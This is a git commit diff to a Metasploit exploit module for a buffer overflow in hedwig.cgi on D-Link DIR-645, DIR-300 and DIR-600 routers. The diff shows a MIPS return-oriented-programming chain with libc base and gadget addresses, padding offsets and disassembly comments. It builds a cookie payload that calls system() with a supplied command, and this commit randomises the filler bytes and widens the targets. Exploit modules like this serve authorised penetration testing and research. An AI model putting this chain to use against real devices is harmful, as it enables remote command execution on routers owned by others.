clean up

2014-06-14 17:02:55 +02:00 · 2014-06-14 17:02:55 +02:00 · 8eb21ded97
parent a3ae177347
commit 8eb21ded97
1 changed files with 7 additions and 11 deletions
--- a/modules/exploits/linux/http/dlink_hedwigcgi_rop_system_echo.rb
+++ b/modules/exploits/linux/http/dlink_hedwigcgi_rop_system_echo.rb
@ -6,7 +6,7 @@
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ManualRanking # the exploit as it is is excellent but we can only start the telnetd and connect to it
+  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Linux,\ HTTP\/1.0,\ DIR-/ ] }

@ -39,10 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote
        ],
      'Targets'        =>
        [
-          [ 'D-Link DIR-645 v1.03',
+          [ 'Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600',
            {
              'Offset'      => 973,
-              'LibcBase'    => 0x2aaf8000,    #Router
+              'LibcBase'    => 0x2aaf8000,    # Router
              #'LibcBase'   => 0x40854000,    # QEMU environment
              'System'      => 0x000531FF,    # address of system
              'CalcSystem'  => 0x000158C8,    # calculate the correct address of system
@ -84,13 +84,10 @@ class Metasploit3 < Msf::Exploit::Remote
    )
  end

-
  def prepare_shellcode(cmd)
-
-    # prepare our shellcode that triggers the crash:
-    shellcode = "\x41" * target['Offset']                  # padding
+    shellcode = rand_text_alpha_upper(target['Offset'])                  # padding
    shellcode << [target['LibcBase'] + target['System']].pack("V")       # s0 - address of system
-    shellcode << "\x42" * 16                               # unused reg $s1 - $s4
+    shellcode << rand_text_alpha_upper(16)                               # unused reg $s1 - $s4
    shellcode << [target['LibcBase'] + target['CallSystem']].pack("V")   # s5 - second gadget (call system)

        # .text:000159CC 10 00 B5 27    addiu   $s5, $sp, 0x170+var_160  # get the address of our command into $s5
@ -100,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote
        # .text:000159DC 09 F8 20 03    jalr    $t9                      # call system
        # .text:000159E0 21 20 A0 02    move    $a0, $s5                 # our cmd -> into a0 as parameter for system

-    shellcode << "\x43" * 12                               # unused registers $s6 - $fp
+    shellcode << rand_text_alpha_upper(12)                               # unused registers $s6 - $fp
    shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V")   # $ra - gadget nr 1 (prepare the parameter for system)

        # .text:000158C8 21 C8 A0 02    move    $t9, $s5                 # s5 - our second gadget
        # .text:000158CC 09 F8 20 03    jalr    $t9                      # jump the second gadget
        # .text:000158D0 01 00 10 26    addiu   $s0, 1                   # s0 our system address - lets calculate the right address

-    shellcode << "\x99" * 16                               # filler in front of our command
+    shellcode << rand_text_alpha_upper(16)                               # filler in front of our command
    shellcode << cmd
  end

@ -117,7 +114,6 @@ class Metasploit3 < Msf::Exploit::Remote
    begin
      res = send_request_cgi({
        'method' => 'POST',
-        #'uri' => "/hedwig_gdb.cgi",	#for debugging on the router
        'uri' => "/hedwig.cgi",
        'cookie'   => "uid=#{shellcode}",
        'encode_params' => false,